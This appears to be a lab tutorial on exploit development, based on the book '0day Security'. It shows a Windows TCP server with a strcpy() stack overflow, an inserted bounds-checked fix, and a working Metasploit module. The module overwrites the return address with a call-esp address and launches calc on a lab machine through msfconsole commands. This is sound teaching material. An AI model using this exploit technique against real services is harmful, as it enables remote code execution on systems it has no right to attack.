[0day Security: Software Vulnerability Analysis Techniques] Exploit Development for Dummies

Following the vulnerable program from the book, a quick walkthrough of writing an msf exploit module for it.

  • Lab environment
  • Target: Windows 10, IP: 10.211.55.3
  • Attacker: kali3
  • Attack tool: metasploit

  • The program is a very simple TCP socket program: it listens for TCP connections on port 7777 and prints whatever data it receives to the screen. It has a stack overflow vulnerability.

// Vulnerable spot: the strcpy() call causes a stack overflow
#include <iostream>
#include <cstring>
#include <winsock2.h>   // sockaddr_in on Windows (the program targets Win32)
using namespace std;

void msg_display(char * buf)
{
    char msg[200];
    strcpy(msg,buf);// overflow here, copy 0x200 to 200
    cout<<"********************"<<endl;
    cout<<"received:"<<endl;
    cout<<msg<<endl;
}

int main()
{
    int sock,msgsock,lenth,receive_len;
    struct sockaddr_in sock_server,sock_client;
    char buf[0x200]; //noticed it is 0x200
    ...
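The root cause is that strcpy() copies strlen(buf)+1 bytes into a 200-byte stack array while the receive buffer holds up to 0x200 bytes. As an added example (not code from the book or this post), here is a check that shows when the original copy would overflow, next to a bounds-checked replacement for msg_display(); the names strcpy_would_overflow, msg_display_safe, MSG_SIZE and RECV_SIZE are my own.

```cpp
#include <cstddef>
#include <cstring>
#include <iostream>
#include <string>

// Size of the stack buffer in the book's msg_display() (assumed from the listing above).
const std::size_t MSG_SIZE = 200;
// Size of buf[] in the server's main(), i.e. the most data one recv() can hand over.
const std::size_t RECV_SIZE = 0x200;

// Returns true if strcpy(msg, buf) into a MSG_SIZE-byte array would overflow.
// strcpy copies strlen(buf)+1 bytes (the NUL included) regardless of the destination size.
bool strcpy_would_overflow(const char* buf) {
    return std::strlen(buf) + 1 > MSG_SIZE;
}

// Hardened replacement: copy with an explicit length bound, always NUL-terminate,
// and report truncation so the caller can log oversized input instead of crashing.
// 'shown' (optional) receives exactly the text that was printed.
bool msg_display_safe(const char* buf, std::size_t len, std::string* shown) {
    char msg[MSG_SIZE];
    std::size_t n = (len < MSG_SIZE - 1) ? len : MSG_SIZE - 1;  // leave room for the NUL
    std::memcpy(msg, buf, n);
    msg[n] = '\0';
    if (shown) shown->assign(msg, n);
    std::cout << "********************" << std::endl;
    std::cout << "received:" << std::endl;
    std::cout << msg << std::endl;
    return len > MSG_SIZE - 1;   // true means the input was truncated
}

int main() {
    // Constructed input: a full receive buffer worth of 'a' (0x200 - 1 bytes plus the NUL).
    std::string oversized(RECV_SIZE - 1, 'a');
    std::cout << "strcpy would overflow: " << strcpy_would_overflow(oversized.c_str()) << std::endl;

    std::string shown;
    bool truncated = msg_display_safe(oversized.data(), oversized.size(), &shown);
    std::cout << "truncated: " << truncated << ", printed " << shown.size() << " bytes" << std::endl;
    return 0;
}
```

The fix keeps the length the server already knows from recv() and never relies on the data being NUL-terminated, which also removes the dependence on the "\x00" bad character that the exploit module below has to work around.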

Then create a new folder under msf's exploits directory to hold our exp.

  • test.rb
#!/usr/bin/env ruby
require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  # The service is a raw TCP listener, so the Tcp mixin is the right one.
  # The Ftp mixin used originally also works, but first waits for an FTP banner.
  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'security test',
      'Description' => %q{
        This module exploits a buffer overflow.
      },
      'Author'      => 'hacker_mao',
      'Payload'     =>
        {
          'Space'    => 300,      # 200 + 4 + 300 bytes still fit in the 0x200-byte recv buffer
          'BadChars' => "\x00",   # strcpy() stops at the first NUL byte
        },
      'Platform'    => 'win',
      'Targets'     =>
        [
          [ 'Windows 10', { 'Ret' => 0x753FF9D3 } ],
        ]))

    register_options([ Opt::RPORT(7777) ])   # the service listens on port 7777
  end

  def exploit
    connect
    attack_buf  = 'a' * 200                    # fills msg[200]
    attack_buf += [target['Ret']].pack('V')    # little-endian return address
    attack_buf += payload.encoded
    sock.put(attack_buf)
    handler
    disconnect
  end
end
  • The Ret address in the exp above is actually the address of a call esp instruction, which has to be found on your own system; the OllyDbg plugin OllyUni.dll can be used to search for one. Here we simply picked the one at 0x753FF9D3.

  • Then go straight to msf and run it in one go
root@kali:~# msfconsole
msf > use exploit/test/test
msf exploit(test/test) > set target 0
msf exploit(test/test) > set payload windows/exec
msf exploit(test/test) > set rhost 10.211.55.3
msf exploit(test/test) > set rport 7777
msf exploit(test/test) > set cmd calc
msf exploit(test/test) > set exitfunc seh
msf exploit(test/test) > exploit

  • The calc command ran successfully.